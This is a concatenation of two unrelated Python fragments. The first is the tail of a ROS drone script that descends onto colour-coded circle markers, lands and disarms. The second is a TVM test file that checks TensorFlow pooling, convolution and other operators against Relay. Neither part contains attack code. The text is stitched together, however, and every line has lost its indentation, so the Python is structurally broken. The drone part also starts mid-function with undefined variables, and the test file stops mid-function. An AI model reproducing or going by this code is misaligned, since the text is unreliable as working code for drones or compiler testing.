rc.markers_arr_clb(result_GLOBAL)
rc.circles_arr_clb(circles_GLOBAL)
print(rc.circles)
circles_copy = list(rc.circles)
if len(circles_copy) > 0:
for i in range(len(circles_copy)):
if rc.distance((circles_copy[i].cx_map, circles_copy[i].cy_map), landCoordinate) <= 0.6 and circle_type_mapping[circles_copy[i].color] == markerType:
navigate_wait(circles_copy[i].cx_map, circles_copy[i].cy_map, landingPath[j][2])
last = list(circles_copy)
break
else:
circles_copy = []
j += 1
if len(circles_copy) == 0:
if last == None:
navigate_wait(landCoordinate[0], landCoordinate[1], 1.5)
else:
navigate_wait(circles_copy[-1].cx_map, circles_copy[-1].cy_map, 1.5)
telem = get_telemetry_aruco()
print("777")
# LANDING SYSTEM
print("markerType_LANDING", markerType)
print("STAGE2")
time_st = time.time()
TIMEOUT_H = 2.913
landing_update_rate = rospy.Rate(9)
OFFSET = [18, 18] # pixels
while (time.time() - time_st) < TIMEOUT_H:
markers = [i for i in circles_GLOBAL if circle_type_mapping[i.color] == markerType]
print(markers)
if len(markers) > 0:
marker = markers[0]
x_b, y_b, z_b, _ = transform_xyz_yaw(
marker.cx_cam, marker.cy_cam, marker.cz_cam, 0, "main_camera_optical", "body", listener)
# nav_broadcaster.sendTransform(
# (x_b, y_b, z_b),
# tf.transformations.quaternion_from_euler(0, 0, 0),
# rospy.Time.now(),
# "landing_target",
# "body"
# )
rospy.sleep(0.0913)
print(x_b, y_b, z_b)
set_position(x=x_b, y=y_b, z=-0.075, frame_id="body")
if abs(z_b) < 0.2:
break
landing_update_rate.sleep()
print("LANDDDDDDDDDDDDDDDD")
land()
vr.stop()
rospy.sleep(1.5)
print("DISARM")
arming(False)
print('DONE')
|
test_forward.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=import-self, invalid-name, unused-argument
"""
Tensorflow testcases
====================
This article is a test script to test tensorflow operator with Relay.
"""
from __future__ import print_function
import threading
import numpy as np
import pytest
try:
import tensorflow.compat.v1 as tf
except ImportError:
import tensorflow as tf
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import graph_util
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.ops import init_ops
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import gen_functional_ops
from distutils.version import LooseVersion
import tvm
from tvm import te
from tvm import relay
import tvm.relay.testing.tf as tf_testing
from tvm.runtime.vm import VirtualMachine
from packaging import version as package_version
import tvm.testing
#######################################################################
# Generic run functions for TVM & tensorflow
# ------------------------------------------
def convert_to_list(x):
if not isinstance(x, list):
x = [x]
return x
tf_dtypes = {
"float32": tf.float32,
"float16": tf.float16,
"float64": tf.float64,
"int32": tf.int32,
"uint8": tf.uint8,
"int8": tf.int8,
"int16": tf.int16,
"uint16": tf.uint16,
"int64": tf.int64,
}
def vmobj_to_list(o):
if isinstance(o, tvm.nd.NDArray):
return [o.asnumpy()]
elif isinstance(o, tvm.runtime.container.ADT):
result = []
for f in o:
result.extend(vmobj_to_list(f))
return result
elif isinstance(o, tvm.relay.backend.interpreter.ConstructorValue):
if o.constructor.name_hint == "Cons":
tl = vmobj_to_list(o.fields[1])
hd = vmobj_to_list(o.fields[0])
hd.extend(tl)
return hd
elif o.constructor.name_hint == "Nil":
return []
elif "tensor_nil" in o.constructor.name_hint:
return [0]
elif "tensor" in o.constructor.name_hint:
return [o.fields[0].asnumpy()]
else:
raise RuntimeError("Unknown object type: %s" % o.constructor.name_hint)
else:
raise RuntimeError("Unknown object type: %s" % type(o))
def run_tvm_graph(
graph_def,
input_data,
input_node,
num_output=1,
target="llvm",
out_names=None,
opt_level=3,
mode="graph_executor",
cuda_layout="NCHW",
layout=None,
disabled_pass=None,
ignore_in_shape=False,
serialize=False,
):
""" Generic function to compile on relay and execute on tvm """
input_data = convert_to_list(input_data)
input_node = convert_to_list(input_node)
if target == "cuda":
layout = cuda_layout
target_host = None
if ignore_in_shape:
shape_dict = None
else:
shape_dict = {
e: i.shape if hasattr(i, "shape") else () for e, i in zip(input_node, input_data)
}
mod, params = relay.frontend.from_tensorflow(
graph_def, layout=layout, shape=shape_dict, outputs=out_names
)
dev = tvm.device(target, 0)
if mode == "debug":
ex = relay.create_executor(mode, mod=mod, device=tvm.cpu(), target="llvm")
inputs = []
for param in mod["main"].params:
found = False
for i, n in enumerate(input_node):
if n == param.name_hint:
found = True
inputs.append(tvm.nd.array(input_data[i]))
break
# Interpreter doesn't bind constants, so still need to find in params
if not found:
inputs.append(tvm.nd.array(params[param.name_hint]))
result = ex.evaluate()(*inputs)
return vmobj_to_list(result)
elif mode == "vm":
with tvm.transform.PassContext(opt_level=opt_level, disabled_pass=disabled_pass):
print(mod["main"])
mod = relay.transform.InferType()(mod)
vm_exec = relay.vm.compile(mod, target="llvm", params=params)
if serialize:
code, lib = vm_exec.save()
vm_exec = tvm.runtime.vm.Executable.load_exec(code, lib)
vm = VirtualMachine(vm_exec, tvm.cpu())
inputs = {}
for e, i in zip(input_node, input_data):
inputs[e] = tvm.nd.array(i)
result = vm.invoke("main", **inputs)
return vmobj_to_list(result)
else:
with tvm.transform.PassContext(opt_level=opt_level, disabled_pass=disabled_pass):
target = tvm.target.Target(target, target_host)
graph, lib, params = relay.build(mod, target=target, params=params)
from tvm.contrib import graph_executor
m = graph_executor.create(graph, lib, dev)
# set inputs
for e, i in zip(input_node, input_data):
if e != "":
m.set_input(e, tvm.nd.array(i))
m.set_input(**params)
# execute
m.run()
# get outputs
assert out_names is None or num_output == len(
out_names
), "out_names: {} num_output: {}".format(out_names, num_output)
tvm_output_list = [m.get_output(i).asnumpy() for i in range(num_output)]
return tvm_output_list
def run_tf_graph(sess, input_data, input_node, output_node):
""" Generic function to execute tensorflow """
input_data = convert_to_list(input_data)
input_node = convert_to_list(input_node)
output_node = convert_to_list(output_node)
tensor = [sess.graph.get_tensor_by_name(output_name) for output_name in output_node]
input_dict = {e: input_data[i] for i, e in enumerate(input_node)}
if len(input_node) == 1 and input_node[0] == "":
output_data = sess.run(tensor)
else:
output_data = sess.run(tensor, input_dict)
return output_data
def compare_tf_with_tvm(
in_data,
in_name,
out_name,
init_global_variables=False,
no_gpu=False,
opt_level=3,
mode="graph_executor",
cuda_layout="NCHW",
add_shapes_to_graph_def=True,
targets=None,
):
"""Generic function to generate and compare tensorflow and TVM output"""
def name_without_num(name):
return name.split(":")[0] if ":" in name else name
out_name = convert_to_list(out_name)
out_node = [name_without_num(name) for name in out_name]
in_data = convert_to_list(in_data)
in_name = convert_to_list(in_name)
in_node = [name_without_num(name) for name in in_name]
with tf.Session() as sess:
if init_global_variables:
sess.run(variables.global_variables_initializer())
final_graph_def = (
tf_testing.AddShapesToGraphDef(sess, out_node)
if add_shapes_to_graph_def
else tf.get_default_graph().as_graph_def()
)
tf_output = run_tf_graph(sess, in_data, in_name, out_name)
devices = targets if targets else ["llvm", "cuda"]
for device in devices:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
if no_gpu and device == "cuda":
continue
if "cublas" in device and not tvm.get_global_func("tvm.contrib.cublas.matmul", True):
print("Skip because cublas is not enabled: %s" % device)
continue
tvm_output = run_tvm_graph(
final_graph_def,
in_data,
in_node,
target=device,
out_names=out_name,
num_output=len(out_name),
opt_level=opt_level,
mode=mode,
cuda_layout=cuda_layout,
)
# since the names from tensorflow and relay runs are not exactly same,
# first len(tf_output) will be compared
for i in range(len(tf_output)):
if not isinstance(tf_output[i], np.ndarray):
assert len(tvm_output[i].shape) == 0
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-5, rtol=1e-5)
sess.close()
def is_gpu_available():
from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices()
gpu_list = [x.name for x in local_device_protos if x.device_type == "GPU"]
if len(gpu_list) > 0:
print("Tensorflow GPU:", gpu_list)
return True
else:
return False
#######################################################################
# Pooling
# -------
def _test_pooling_iteration(input_shape, **kwargs):
""" One iteration of pool operation with given shapes and attributes """
x = -np.arange(np.prod(input_shape), dtype=np.float32).reshape(input_shape) - 1
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=input_shape, dtype="float32")
nn_ops.pool(in_data, **kwargs)
if kwargs["pooling_type"] == "MAX":
out_name = "max_pool:0"
else:
out_name = "avg_pool:0"
compare_tf_with_tvm(x, "Placeholder:0", out_name)
def _test_pooling(input_shape, **kwargs):
_test_pooling_iteration(input_shape, **kwargs)
if is_gpu_available():
if len(input_shape) == 4:
input_shape = [input_shape[ii] for ii in (0, 3, 1, 2)]
kwargs["data_format"] = "NCHW"
_test_pooling_iteration(input_shape, **kwargs)
@tvm.testing.uses_gpu
def test_forward_pooling():
""" Pooling """
# TensorFlow only supports NDHWC for max_pool3d on CPU
for pool_type in ["AVG", "MAX"]:
# NDHWC is the default layout for max_pool3d and avg_pool3d in TensorFlow
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[2, 2, 2],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[2, 2, 2],
)
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[1, 1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[1, 1, 1],
)
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[2, 2, 2],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[2, 2, 2],
)
# test cases for max_pool3d & avg_pool3d with layout NCDHW
# TensorFlow pool3d doesn't support NCDHW on cpu
if is_gpu_available():
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[1, 1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[1, 1, 1],
data_format="NCDHW",
)
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[2, 2, 2],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[2, 2, 2],
data_format="NCDHW",
)
_test_pooling(
input_shape=[2, 9, 10, 2],
window_shape=[1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
_test_pooling(
input_shape=[2, 10, 9, 2],
window_shape=[1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
_test_pooling(
input_shape=[2, 9, 10, 2],
window_shape=[2, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
_test_pooling(
input_shape=[2, 10, 9, 2],
window_shape=[2, 3],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[2, 1],
)
# Tests involving SpaceToBatchND
_test_pooling(
input_shape=[1, 1, 2, 1],
window_shape=[1, 1],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[1, 2],
)
_test_pooling(
input_shape=[1, 2, 1],
window_shape=[1],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[2],
)
# Explicit padding
if package_version.parse(tf.VERSION) >= package_version.parse("2.4.1"):
_test_pooling(
input_shape=[2, 9, 10, 2],
window_shape=[4, 4],
padding=[[0, 0], [0, 1], [2, 3], [0, 0]],
pooling_type="MAX",
dilation_rate=[1, 1],
strides=[1, 1],
)
#######################################################################
# Convolution
# -----------
def _test_convolution(
opname,
tensor_in_sizes,
filter_in_sizes,
dilations,
strides,
padding,
data_format,
deconv_output_shape=[],
add_shapes_to_graph_def=True,
):
""" One iteration of convolution with given shapes and attributes """
total_size_1 = np.prod(tensor_in_sizes)
total_size_2 = np.prod(filter_in_sizes)
# Initializes the input tensor with array containing incrementing
# numbers from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
filter_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_filter = constant_op.constant(filter_array, shape=filter_in_sizes, dtype="float32")
if data_format == "NHWC":
strides = [1] + strides + [1]
dilations = [1] + dilations + [1]
else:
strides = [1, 1] + strides
dilations = [1, 1] + dilations
if opname == "conv":
nn_ops.conv2d(
in_data,
in_filter,
strides=strides,
dilations=dilations,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"Conv2D:0",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
elif opname == "conv_transpose":
nn_ops.conv2d_transpose(
in_data,
in_filter,
output_shape=deconv_output_shape,
strides=strides,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"conv2d_transpose:0",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
else:
nn_ops.depthwise_conv2d_native(
in_data,
in_filter,
strides=strides,
dilations=dilations,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"DepthwiseConv2dNative:0",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
@tvm.testing.uses_gpu
def test_forward_convolution():
if is_gpu_available():
_test_convolution("conv", [4, 176, 8, 8], [1, 1, 176, 32], [1, 1], [1, 1], "SAME", "NCHW")
_test_convolution("conv", [4, 19, 17, 17], [3, 3, 19, 19], [1, 1], [2, 2], "VALID", "NCHW")
_test_convolution("conv", [4, 124, 17, 17], [1, 1, 124, 19], [1, 1], [1, 1], "SAME", "NCHW")
_test_convolution("conv", [4, 12, 17, 17], [3, 3, 12, 32], [1, 1], [2, 2], "VALID", "NCHW")
_test_convolution(
"depthwise", [4, 176, 8, 8], [1, 1, 176, 1], [1, 1], [1, 1], "SAME", "NCHW"
)
_test_convolution(
"depthwise", [4, 19, 17, 17], [3, 3, 19, 1], [1, 1], [2, 2], "VALID", "NCHW"
)
_test_convolution(
"depthwise", [4, 124, 17, 17], [1, 1, 124, 1], [1, 1], [1, 1], "SAME", "NCHW"
)
_test_convolution(
"depthwise", [4, 12, 17, 17], [3, 3, 12, 1], [1, 1], [2, 2], "VALID", "NCHW"
)
_test_convolution(
"depthwise", [4, 12, 17, 17], [3, 3, 12, 2], [1, 1], [2, 2], "VALID", "NCHW"
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[1, 1, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 176, 8, 8],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[2, 2, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 176, 8, 8],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[2, 2, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NCHW",
[4, 176, 15, 15],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 176, 8, 8],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NCHW",
[4, 176, 15, 15],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NCHW",
[4, 176, 16, 16],
)
_test_convolution(
"conv_transpose",
[4, 19, 8, 8],
[3, 3, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 19, 17, 17],
)
_test_convolution(
"conv_transpose",
[4, 19, 17, 17],
[1, 1, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 124, 17, 17],
)
_test_convolution(
"conv_transpose",
[4, 19, 17, 17],
[3, 3, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 124, 17, 17],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 12, 17, 17],
)
# kernel 2x2, strides (2,2)
_test_convolution(
"conv_transpose",
[4, 19, 8, 8],
[2, 2, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 19, 16, 16],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[2, 2, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 12, 16, 16],
)
# output channel is 1
_test_convolution(
"conv_transpose",
[1, 19, 8, 8],
[1, 1, 1, 19],
[1, 1],
[1, 1],
"VALID",
"NCHW",
[1, 1, 8, 8],
)
_test_convolution("conv", [4, 8, 8, 176], [1, 1, 176, 32], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("conv", [4, 17, 17, 19], [3, 3, 19, 19], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution("conv", [4, 17, 17, 124], [1, 1, 124, 19], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("conv", [4, 17, 17, 12], [3, 3, 12, 32], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution(
"conv",
[4, 17, 17, 12],
[3, 3, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NHWC",
add_shapes_to_graph_def=False,
)
_test_convolution("depthwise", [4, 8, 8, 176], [1, 1, 176, 1], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 19], [3, 3, 19, 1], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 124], [1, 1, 124, 1], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 12], [3, 3, 12, 1], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 12], [3, 3, 12, 2], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution(
"depthwise",
[4, 17, 17, 12],
[3, 3, 12, 2],
[1, 1],
[2, 2],
"VALID",
"NHWC",
add_shapes_to_graph_def=False,
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[1, 1, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[2, 2, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[2, 2, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NHWC",
[4, 15, 15, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NHWC",
[4, 15, 15, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NHWC",
[4, 16, 16, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 19],
[3, 3, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 17, 17, 19],
)
_test_convolution(
"conv_transpose",
[4, 17, 17, 19],
[1, 1, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 17, 17, 124],
)
_test_convolution(
"conv_transpose",
[4, 17, 17, 19],
[3, 3, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 17, 17, 124],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 17, 17, 12],
)
# kernel 2x2, strides (2,2)
_test_convolution(
"conv_transpose",
[4, 8, 8, 19],
[2, 2, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 16, 16, 19],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[2, 2, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 16, 16, 12],
)
# output channel is 1
_test_convolution(
"conv_transpose",
[1, 8, 8, 19],
[1, 1, 1, 19],
[1, 1],
[1, 1],
"VALID",
"NHWC",
[1, 8, 8, 1],
)
# Test without adding shapes to graph def
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[1, 1, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
add_shapes_to_graph_def=False,
)
# Explicit padding
if package_version.parse(tf.VERSION) >= package_version.parse("2.4.1"):
_test_convolution(
"conv",
[4, 8, 8, 16],
[1, 1, 16, 32],
[1, 1],
[1, 1],
[[0, 0], [2, 3], [0, 1], [0, 0]],
"NHWC",
)
_test_convolution(
"depthwise",
[4, 8, 8, 16],
[1, 1, 16, 1],
[1, 1],
[1, 1],
[[0, 0], [2, 3], [0, 1], [0, 0]],
"NHWC",
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[2, 2],
[[0, 0], [1, 0], [1, 0], [0, 0]],
"NHWC",
[4, 16, 16, 176],
)
#######################################################################
# Convolution3D
# -------------
def _test_convolution3d(
opname,
tensor_in_sizes,
filter_in_sizes,
dilations,
strides,
padding,
data_format,
deconv_output_shape=[],
add_shapes_to_graph_def=True,
):
""" One iteration of 3D convolution with given shapes and attributes """
total_size_1 = np.prod(tensor_in_sizes)
total_size_2 = np.prod(filter_in_sizes)
# Initializes the input tensor with array containing incrementing
# numbers from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
filter_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_filter = constant_op.constant(filter_array, shape=filter_in_sizes, dtype="float32")
if data_format == "NDHWC":
strides = [1] + strides + [1]
dilations = [1] + dilations + [1]
else:
strides = [1, 1] + strides
dilations = [1, 1] + dilations
if opname == "conv":
nn_ops.conv3d(
in_data,
in_filter,
strides=strides,
dilations=dilations,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"Conv3D:0",
cuda_layout="NCDHW",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
@tvm.testing.uses_gpu
def test_forward_convolution3d():
if is_gpu_available():
_test_convolution3d(
"conv", [4, 176, 8, 8, 8], [1, 1, 1, 176, 32], [1, 1, 1], [1, 1, 1], "SAME", "NCDHW"
)
_test_convolution3d(
"conv", [4, 19, 17, 17, 17], [3, 3, 3, 19, 19], [1, 1, 1], [2, 2, 2], "VALID", "NCDHW"
)
_test_convolution3d(
"conv", [4, 124, 17, 17, 17], [1, 1, 1, 124, 19], [1, 1, 1], [1, 1, 1], "SAME", "NCDHW"
)
_test_convolution3d(
"conv", [4, 12, 17, 17, 17], [3, 3, 3, 12, 32], [1, 1, 1], [2, 2, 2], "VALID", "NCDHW"
)
_test_convolution3d(
"conv", [4, 8, 8, 8, 176], [1, 1, 1, 176, 32], [1, 1, 1], [1, 1, 1], "SAME", "NDHWC"
)
_test_convolution3d(
"conv", [4, 17, 17, 17, 19], [3, 3, 3, 19, 19], [1, 1, 1], [2, 2, 2], "VALID", "NDHWC"
)
_test_convolution3d(
"conv", [4, 17, 17, 17, 124], [1, 1, 1, 124, 19], [1, 1, 1], [1, 1, 1], "SAME", "NDHWC"
)
_test_convolution3d(
"conv", [4, 17, 17, 17, 12], [3, 3, 3, 12, 32], [1, 1, 1], [2, 2, 2], "VALID", "NDHWC"
)
# Test without adding shapes to graph def
_test_convolution3d(
"conv",
[4, 17, 17, 17, 12],
[3, 3, 3, 12, 32],
[1, 1, 1],
[2, 2, 2],
"VALID",
"NDHWC",
add_shapes_to_graph_def=False,
)
#######################################################################
# Convolution3D Transpose
# -----------------------
def _test_convolution3d_transpose(
data_shape,
filter_shape,
strides,
padding,
output_shape,
data_format="NCDHW",
add_shapes_to_graph_def=True,
):
""" One iteration of 3D convolution transpose with given shapes and attributes """
dtype = "float32"
data_array = np.random.uniform(size=data_shape).astype(dtype)
filter_array = np.random.uniform(size=filter_shape).astype(dtype)
if data_format == "NDHWC":
strides = [1] + strides + [1]
else:
strides = [1, 1] + strides
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data_shape, dtype=dtype)
in_filter = constant_op.constant(filter_array, shape=filter_shape, dtype=dtype)
nn_ops.conv3d_transpose(
in_data,
in_filter,
output_shape=output_shape,
strides=strides,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
data_array,
"Placeholder:0",
"conv3d_transpose:0",
cuda_layout="NDHWC",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
@tvm.testing.uses_gpu
def test_forward_convolution3d_transpose():
if is_gpu_available():
_test_convolution3d_transpose(
data_shape=[1, 10, 8, 8, 8],
filter_shape=[1, 1, 1, 6, 10],
strides=[1, 1, 1],
padding="VALID",
output_shape=[1, 6, 8, 8, 8],
)
_test_convolution3d_transpose(
data_shape=[4, 9, 8, 8, 8],
filter_shape=[1, 1, 1, 6, 9],
strides=[1, 1, 1],
padding="VALID",
output_shape=[4, 6, 8, 8, 8],
)
_test_convolution3d_transpose(
data_shape=[1, 3, 8, 8, 8],
filter_shape=[1, 1, 1, 6, 3],
strides=[2, 2, 2],
padding="SAME",
output_shape=[1, 6, 15, 15, 15],
)
_test_convolution3d_transpose(
data_shape=[1, 16, 8, 8, 8],
filter_shape=[3, 3, 3, 6, 16],
strides=[3, 3, 3],
padding="VALID",
output_shape=[1, 6, 24, 24, 24],
)
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 10],
filter_shape=[1, 1, 1, 6, 10],
strides=[1, 1, 1],
padding="VALID",
output_shape=[1, 8, 8, 8, 6],
data_format="NDHWC",
)
_test_convolution3d_transpose(
data_shape=[4, 8, 8, 8, 9],
filter_shape=[1, 1, 1, 6, 9],
strides=[1, 1, 1],
padding="VALID",
output_shape=[4, 8, 8, 8, 6],
data_format="NDHWC",
)
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 3],
filter_shape=[1, 1, 1, 6, 3],
strides=[2, 2, 2],
padding="SAME",
output_shape=[1, 15, 15, 15, 6],
data_format="NDHWC",
)
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 16],
filter_shape=[3, 3, 3, 6, 16],
strides=[3, 3, 3],
padding="VALID",
output_shape=[1, 24, 24, 24, 6],
data_format="NDHWC",
)
# Test without adding shapes to graph def
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 16],
filter_shape=[3, 3, 3, 6, 16],
strides=[3, 3, 3],
padding="VALID",
output_shape=[1, 24, 24, 24, 6],
data_format="NDHWC",
add_shapes_to_graph_def=False,
)
#######################################################################
# BiasAdd
# -----------
def _test_biasadd(tensor_in_sizes, data_format):
""" One iteration of biasadd with given shapes and attributes """
total_size_1 = 1
for s in tensor_in_sizes:
total_size_1 *= s
tensor_bias_sizes = [tensor_in_sizes[1]] if data_format == "NCHW" else [tensor_in_sizes[3]]
total_size_2 = tensor_bias_sizes[0]
# Initializes the input tensor with array containing incrementing
# numbers from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
bias_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_bias = constant_op.constant(bias_array, shape=tensor_bias_sizes, dtype="float32")
nn_ops.bias_add(in_data, in_bias, data_format=data_format)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"), "Placeholder:0", "BiasAdd:0"
)
@tvm.testing.uses_gpu
def test_forward_biasadd():
if is_gpu_available():
_test_biasadd([4, 176, 8, 8], "NCHW")
_test_biasadd([1, 100, 1, 1], "NCHW")
_test_biasadd([4, 19, 17, 17], "NCHW")
_test_biasadd([4, 124, 3, 3], "NCHW")
_test_biasadd([4, 8, 8, 176], "NHWC")
_test_biasadd([1, 1, 1, 100], "NHWC")
_test_biasadd([4, 17, 17, 19], "NHWC")
_test_biasadd([4, 3, 3, 124], "NHWC")
def _test_forward_where(input_shape):
with tf.Graph().as_default():
dtype = tf.float32
t = tf.constant(
np.random.choice([0, 1, -2, 3, -1, 0.1, -0.2], size=input_shape).astype(dtype.name)
)
out = tf.where(t)
compare_tf_with_tvm([], [], out.name, mode="debug")
compare_tf_with_tvm([], [], out.name, mode="vm")
def test_forward_argwhere():
_test_forward_where((5,))
_test_forward_where((5, 5))
_test_forward_where((5, 5, 5))
_test_forward_where((5, 5, 5, 5))
_test_forward_where((5, 5, 5, 5, 5))
#######################################################################
# SpaceToBatchND
# --------------
def _test_space_to_batch_nd(input_shape, block_shape, paddings, dtype="int32"):
data = np.random.uniform(0, 5, size=input_shape).astype(dtype)
with tf.Graph().as_default():
in_data = tf.placeholder(shape=input_shape, dtype=dtype)
out = tf.space_to_batch_nd(in_data, block_shape, paddings)
compare_tf_with_tvm(data, in_data.name, out.name)
def _test_space_to_batch_nd_infer_paddings(input_shape, block_shape, dtype="int32"):
data = np.random.uniform(0, 5, size=input_shape).astype(dtype)
